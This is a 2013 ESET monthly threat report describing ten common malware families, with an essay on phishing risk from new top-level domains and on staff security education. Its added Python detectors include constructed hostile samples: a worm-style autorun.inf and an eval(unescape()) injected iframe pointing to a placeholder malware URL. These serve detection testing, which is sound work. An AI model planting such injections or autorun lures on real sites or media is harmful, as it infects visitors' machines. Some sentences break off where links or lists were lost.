Monthly Threat Report: September 2013


1. Win32/Bundpil

Previous Ranking: 2
Percentage Detected: 3.69%

Win32/Bundpil.A is a worm that spreads via removable media. The worm contains a URL and tries to download several files from that address over HTTP; the downloaded files are then executed. The worm may delete the following folders:

2. INF/Autorun

Previous Ranking: 5
Percentage Detected: 2.08%

This detection label is used to describe a variety of malware using the file autorun.inf as a way of compromising a PC. This file contains information on programs meant to run automatically when removable media (often USB flash drives and similar devices) are accessed by a Windows PC user. ESET security software heuristically identifies malware that installs or modifies autorun.inf files as INF/Autorun unless it is identified as a member of a specific malware family.

Removable devices are useful and very popular: of course, malware authors are well aware of this, as INF/Autorun’s frequent return to the number one spot clearly indicates. Here’s why it’s a problem.

The default Autorun setting in Windows will automatically run a program listed in the autorun.inf file when you access many kinds of removable media. There are many types of malware that copy themselves to removable storage devices: while this isn’t always the program’s primary distribution mechanism, malware authors are always ready to build in a little extra “value” by including an additional infection technique.

While use of this mechanism makes such malware easy to spot for a scanner that applies this heuristic, it is better to disable the Autorun function by default than to rely on antivirus detecting it in every case. Windows 7 and later ignore autorun.inf on USB media (only optical discs are still honoured), and update KB971029 brought the same behaviour to XP and Vista; on systems without that update, the NoDriveTypeAutoRun policy value should be set to 0xFF so that no drive type is left with Autorun enabled.
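The following is an added illustration, not ESET code: a small Python check that parses an autorun.inf the way the INF/Autorun heuristic described above might, flagging directives that launch a program from the media, and that interprets the NoDriveTypeAutoRun policy bitmask so you can confirm Autorun is actually disabled for removable drives. The two sample autorun.inf contents are constructed; the drive-type bit values are the documented ones for that policy (0xFF disables all types).

```python
"""Heuristic autorun.inf check, in the spirit of the INF/Autorun label.
Added example, not ESET code.  The sample INF contents are constructed."""
import re

# [autorun] keys that make Windows launch a program when the media is
# inserted or opened, or that redirect the default double-click verb.
_LAUNCH_KEYS = {"open", "shellexecute"}
_SHELL_CMD = re.compile(r"^shell\\[^\\]+\\command$")

# NoDriveTypeAutoRun (HKLM/HKCU ...\Policies\Explorer) is a bitmask; a set
# bit disables Autorun for that drive type.  0xFF disables it everywhere.
DRIVE_BITS = {
    "unknown": 0x01, "no_root_dir": 0x02, "removable": 0x04, "fixed": 0x08,
    "remote": 0x10, "cdrom": 0x20, "ramdisk": 0x40, "reserved": 0x80,
}


def parse_autorun_inf(text):
    """Return {section: {key: value}} for INI-style autorun.inf text.
    Section and key names are lower-cased; a repeated key keeps the last value."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif current is not None and "=" in line:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections


def autorun_findings(text):
    """List (severity, message) pairs for directives a worm typically abuses."""
    findings = []
    auto = parse_autorun_inf(text).get("autorun", {})
    for key, value in auto.items():
        lowered = value.lower()
        if key in _LAUNCH_KEYS or _SHELL_CMD.match(key):
            findings.append(("high", f"{key}={value} runs a program from the media"))
            # Worms hide their binary in folders Explorer normally hides...
            if re.search(r"recycle|system volume information", lowered):
                findings.append(("high", f"{key} points into a normally hidden folder"))
            # ...and disguise it with a document-looking double extension.
            if re.search(r"\.(txt|jpg|doc|pdf)\.(exe|scr|com|pif|bat)$", lowered):
                findings.append(("high", f"{key} uses a double extension"))
        elif key == "shell" and f"shell\\{lowered}\\command" in auto:
            findings.append(("medium", f"default verb redirected to shell\\{lowered}\\command"))
        elif key == "useautoplay" and lowered == "1":
            findings.append(("low", "UseAutoPlay=1 requests the AutoPlay path"))
    return findings


def autorun_disabled_for(mask, drive_type):
    """True when the NoDriveTypeAutoRun mask disables Autorun for drive_type."""
    return bool(mask & DRIVE_BITS[drive_type])


def unprotected_drive_types(mask):
    """Drive types for which the mask still leaves Autorun enabled."""
    return [name for name, bit in DRIVE_BITS.items() if not mask & bit]


# Constructed samples: a typical worm INF and a benign vendor disc label.
WORM_INF = r"""[autorun]
open=RECYCLER\photo.jpg.exe
icon=%SystemRoot%\system32\SHELL32.dll,4
action=Open folder to view files
shell\open\command=RECYCLER\photo.jpg.exe
shell=open
"""

BENIGN_INF = r"""[autorun]
label=Install disc
icon=setup.exe,0
"""

if __name__ == "__main__":
    for sev, msg in autorun_findings(WORM_INF):
        print(sev, msg)
    print("benign:", autorun_findings(BENIGN_INF))
    # 0x91 is a commonly seen value that still leaves removable and CD-ROM on
    print("unprotected with 0x91:", unprotected_drive_types(0x91))
    print("unprotected with 0xFF:", unprotected_drive_types(0xFF))
```

The check deliberately flags any `open=` or `shellexecute=` directive, including a legitimate installer disc: like the ESET heuristic, it reports the mechanism, and it is up to family-specific signatures (or an allow-list) to decide which launches are expected.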

3. Win32/Sality

Previous Ranking: 4
Percentage Detected: 2.05%

Sality is a polymorphic file infector. When run, it starts a service, creates or deletes registry keys related to security software, and ensures that its malicious process is started on every reboot of the operating system.
It infects EXE and SCR files and disables services and processes belonging to security solutions.
More information relating to a specific signature:

4. HTML/Iframe

Previous Ranking: 1
Percentage Detected: 1.78%

Type of infiltration: Virus
HTML/Iframe.B is a generic detection of malicious IFRAME tags embedded in HTML pages, which redirect the browser to a specific URL hosting malicious software.

5. HTML/ScrInject

Previous Ranking: 3
Percentage Detected: 1.73%

Generic detection of HTML web pages containing obfuscated script or iframe tags that automatically redirect to a malware download.
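As an added example (not ESET's detection logic), the scanner below applies the two heuristics the HTML/Iframe and HTML/ScrInject labels describe to an HTML page: an iframe pointing off-site that is sized or styled to be invisible, and an inline script that combines eval/unescape-style calls with a long or high-entropy literal. The sample pages are constructed test data, and the 203.0.113.7 address is taken from the TEST-NET-3 documentation range rather than any real host.

```python
"""Hidden-iframe and obfuscated-script detector for HTML pages.
Added example, not ESET code.  Sample pages are constructed."""
import math
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


def shannon_entropy(s):
    """Bits per character; percent/hex blobs score well above normal JS."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def _tiny(value):
    """True when a width/height attribute is 0 or 1 pixel."""
    if value is None:
        return False
    m = re.match(r"^\s*(\d+)", value)
    return m is not None and int(m.group(1)) <= 1


class InjectScanner(HTMLParser):
    """Collects (kind, detail) findings while the page is parsed."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host
        self.findings = []
        self._in_script = False
        self._script = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            self._check_iframe(a)
        elif tag == "script":
            self._in_script, self._script = True, []

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self._check_script("".join(self._script))

    def handle_data(self, data):
        if self._in_script:
            self._script.append(data)

    def _check_iframe(self, a):
        src = a.get("src") or ""
        host = urlparse(src).hostname
        offsite = host is not None and host != self.page_host
        style = (a.get("style") or "").replace(" ", "").lower()
        hidden = (
            _tiny(a.get("width")) or _tiny(a.get("height"))
            or "display:none" in style or "visibility:hidden" in style
            or re.search(r"(width|height):0(px)?(;|$)", style) is not None
            or re.search(r"(left|top):-\d{3,}", style) is not None   # parked off-screen
        )
        if offsite and hidden:
            self.findings.append(("iframe", src))

    def _check_script(self, body):
        # eval/unescape/fromCharCode over a long or high-entropy literal is
        # the usual shape of an injected, obfuscated loader.
        calls = re.findall(r"\b(eval|unescape|document\.write|String\.fromCharCode)\s*\(", body)
        long_literal = max((len(m) for m in re.findall(r'["\']([^"\']{200,})["\']', body)), default=0)
        high_entropy = len(body) > 200 and shannon_entropy(body) > 5.0
        if calls and (long_literal or high_entropy):
            self.findings.append(("script", ",".join(sorted(set(calls)))))


def scan_html(html, page_host):
    p = InjectScanner(page_host)
    p.feed(html)
    p.close()
    return p.findings


# Constructed samples.  The injected script is the percent-encoded form of a
# document.write() that drops the same 1x1 iframe, wrapped in eval(unescape()).
_PAYLOAD = "document.write('<iframe src=\"http://203.0.113.7/in.php\" width=1 height=1></iframe>')"
_ENCODED = "".join("%%%02x" % ord(c) for c in _PAYLOAD)
INJECTED_PAGE = f"""<html><body>
<p>Welcome to our site</p>
<iframe src="http://203.0.113.7/in.php" width="1" height="1"></iframe>
<script>eval(unescape('{_ENCODED}'))</script>
</body></html>"""

CLEAN_PAGE = """<html><body><p>Hello</p>
<iframe src="https://example.com/widget" width="300" height="200"></iframe>
<script>var x = 1; document.write("<b>" + x + "</b>");</script>
</body></html>"""

if __name__ == "__main__":
    print(scan_html(INJECTED_PAGE, "example.com"))
    print(scan_html(CLEAN_PAGE, "example.com"))
```

The page's own hostname is passed in so that a same-origin iframe (a site's own widget) is not reported; a real deployment would also want to resolve relative `src` values and follow the redirect chain the text mentions, which is out of scope here.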

6. Win32/Dorkbot

Previous Ranking: 7
Percentage Detected: 1.59%

Win32/Dorkbot.A is a worm that spreads via removable media. It contains a backdoor and can be controlled remotely; the file is run-time compressed using UPX.
The worm collects login user names and passwords when the user browses certain web sites, then attempts to send the gathered information to a remote machine.

7. Win32/Conficker

Previous Ranking: 6
Percentage Detected: 1.58%

The Win32/Conficker threat is a network worm originally propagated by exploiting a vulnerability in the Windows operating system. This vulnerability is present in the RPC sub-system (addressed by Microsoft bulletin MS08-067) and can be remotely exploited by an attacker without valid user credentials. Depending on the variant, it may also spread via unsecured shared folders and by removable media, making use of the Autorun facility that was enabled by default in the Windows versions of the time (though not in Windows 7, which honours autorun.inf only on optical media).

Win32/Conficker loads a DLL through the svchost process. This threat contacts web servers with pre-computed domain names to download additional malicious components. Fuller descriptions of Conficker variants are available at

While ESET has effective detection for Conficker, it’s important for end users to ensure that their systems are updated with the Microsoft patch, which has been available since October 2008, so as to avoid other threats using the same vulnerability. Information on the vulnerability itself is available at While later variants dropped the code for infecting via Autorun, it can’t hurt to disable it: this will reduce the impact of the many threats we detect as INF/Autorun. The Research team in San Diego has blogged extensively on Conficker issues:

It’s important to note that it’s possible to avoid most Conficker infection risks generically, by practicing “safe hex”: keep up-to-date with system patches, disable Autorun, and don’t use unsecured shared folders.

8. Win32/Ramnit

Previous Ranking: 8
Percentage Detected: 1.43%

Win32/Ramnit is a file infector: a virus that executes on every system start. It infects DLL and EXE files and also searches for HTM and HTML files in which to write malicious instructions. It exploits a vulnerability on the system (CVE-2010-2568, the Windows Shell .LNK shortcut flaw) that allows it to execute arbitrary code. It can be controlled remotely to capture screenshots, send gathered information, download files from a remote computer and/or the Internet, run executable files, or shut down/restart the computer.

9. Win32/Qhost

Previous Ranking: 9
Percentage Detected: 1.23%

This threat copies itself to the %system32% folder of Windows before starting. It then communicates with its command and control server over DNS. Win32/Qhost can spread through e-mail and gives an attacker control of the infected computer.

10. Win32/Virut

Previous Ranking: 10
Percentage Detected: 0.98%

Win32/Virut is a polymorphic file infector. It infects files with EXE and SCR extensions by appending itself to the last section of the file. Additionally, it searches for HTM, PHP and ASP files and adds a malicious iframe to them. The virus connects to an IRC network and can be controlled remotely.


TLDs, Phishing, Business Security and Education

David Harley CITP FBCS CISSP ESET Senior Research Fellow

Recently we were asked about the security implications of the new wave of professional Top Level Domains (TLDs), notably .bank. This isn’t an issue I’ve really given much thought to: I only work seven days a week. But it seems to me that the central issue with gTLDs (generic TLDs) like .bank as opposed to specific brand TLDs like .barclays is how much trust you can place in the bona fides of a domain.

Some thought has been put into reducing the risk of trademark infringement and avoiding cybersquatting in terms of brand TLDs, and that has an indirect benefit to the user because it makes phishing somewhat less likely. However, once the domain is approved and launched, how safe it is depends on the good intent and security-awareness of the domain holder.

Very heavy use has been made in recent years of subdomains under TLDs such as and .tk to host malicious URLs, as well as of providers whose core business is to offer subdomains (or sub-subdomains) under their own *.com domain. There’s potential here for an expansion of such malicious activity, and I for one am not going to rush to click on any links in any email I receive from {mybank}.bank, let alone such gifts to typosquatting as .comm.

There’s recently been a revitalized discussion on Twitter about the much-heralded death of anti-virus. I’ve been hearing this since about 1994, so it must be going to happen soon. Well, Larry Bridwell and I will be discussing the demise of the industry that pays my bills at the AVAR conference in December, so I won’t devote a lot of space to that issue now, but one of the interesting facets of that Twitter thread came out of a blog by Blaze in which he suggests that there is a blame attribution model where various stakeholders – AV vendors, other security vendors, Microsoft, and other application vendors – attribute some blame to one or more of the other players, but all blame the end user.

I agree, that’s kind of close to a ‘blame the victim’ culture like the one that old-school virus writers and new age cybercriminals are both apt to subscribe to. Kurt Wismer points out though that “at the end of the day, no one is expecting the attackers to collectively vanish, so improving things is going to require changes on the part of other players as well, including the users.” Improving user awareness across the board – particularly for home users – is a bigger job than I can do justice to in a short article, but how about in the business world? As it happens, that’s something else we were asked about recently…

Every kind of business generates and stores data that is potentially of interest to cyber criminals, and even the smallest business should assess how valuable or sensitive its data really is, by performing a formal security audit if appropriate. Businesses of any size are also subject to national data protection laws and need to be aware of these and of the penalties for non-compliance.

As part of their risk analysis, businesses (irrespective of their size) need to consider the impact of a security breach on the business, thinking about who or what would be affected and whether the business could continue to trade if a breach were successful. Once it has a clear view of the risks, it can then decide how to communicate network security policies to its staff.

The first step is to make sure staff are aware of the risks from cyber-criminals. Although cybercrooks are sometimes very cunning and sophisticated, their impact can be drastically reduced by some simple preventative measures and education. Good user education is a filter, not a flood: you can’t educate effectively by hitting people with ‘everything they need to know about security’ in one massive hit: it’s an ongoing process that focuses on essentials, on teaching the user to extrapolate from one example scenario to others, and reinforcement of core messages over the whole period where the staff member works for the company.

It’s essential to create a culture of security awareness where all staff, regardless of level and role, take it for granted that they are part of the solution.

For cyber security efforts to be as successful as they should be, everyone needs to know and understand what the organisation’s cyber security policies are, how to comply with them through proper use of controls, why compliance is important, and the possible consequences of failure to comply (to the company and to the individual).

The goal should be the creation of a “security-aware workforce”: not a workforce comprised entirely of security gurus, but one where employees are empowered to report risky practices to management. Staff training sessions should make employees aware of such things as email safety, password usage, safe mobile use and the importance of data protection, and an Acceptable Use Policy (AUP) for all staff, including approved web and social media usage. Policies, controls and security education should also take into account data-sharing relationships with partners, vendors and clients. An authoritarian approach to security enforcement with draconian penalties won’t suit every environment, but employers should spell out that a breach of security can be very bad news for business and threaten its continued operation. If there are specific disciplinary consequences, they need to be clearly documented so that staff are in no doubt as to their existence.

Education is not a one-time, one-shot process. People forget what they don’t use, and have to be reminded and even re-trained. People are better at complying with policies when they understand the rationale behind them. Even assuming that they intend to comply, they’re likelier to remember to comply if they understand why they should do X and shouldn’t do Y.

Since education is an on-going process, HR can play an important role in ensuring that everyone receives suitable and consistent training in the form most appropriate to their role. IT and HR need to liaise to ensure that people have appropriate training and system privilege levels as they enter the organisation and change roles, and to ensure that they don’t retain inappropriate access once they leave.
